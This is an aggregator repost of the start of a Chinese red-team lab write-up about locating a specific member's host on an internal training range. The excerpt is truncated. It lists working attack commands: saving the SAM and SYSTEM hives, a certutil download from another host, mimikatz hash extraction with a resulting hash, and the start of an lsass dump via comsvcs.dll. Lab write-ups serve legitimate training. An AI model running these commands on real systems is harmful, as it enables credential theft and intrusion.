看啥推荐读物
专栏名称: 红队蓝军
一群热爱网络安全的人,知其黑,守其白。不限于红蓝对抗,web,内网,二进制。
今天看啥  ›  专栏  ›  红队蓝军

记一次内部红队渗透——定位张三

红队蓝军  · 公众号  ·  · 2022-06-29 09:01
本靶场用于内部学员进行渗透测试渗透要求:精准定位到某位成员的个人主机渗透过程物理机网段:192.168.1.1/24上传.php文件拦截上传.aaa文件拦截,白名单验证,00阶段和解析漏洞均无解。尝试dirsearch看下目录。存在1.phpupload.phpindex.php 可知存在文件包含http://www.hongduilanjun.com/index.php?url=./upload/1.jpgipconfig /all 查看得知工作组存在192.168.111.1/24 段。代理忽略。抓本地密码reg save hklm\sam sam.hivreg save hklm\system system.hiv如果解不开明文可以用certutil进行下载certutil.exe -urlcache -split -f http://192.168.111.138/1.zip导出sam表move到web路径下为zip,下载到本地mimikatz解密。删除webshell上zip文件mimikatz.exe "log" "lsadump::sam /system:system.hiv /sam:sam.hiv" "exit"得到hash: administrator:a0f42e3f2c62fe3977e87c4ed35c0f7f获取lsass进程copy c:\windows\system32\comsvcs.dll c:\programdata\1.dlltasklist /svc |  ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照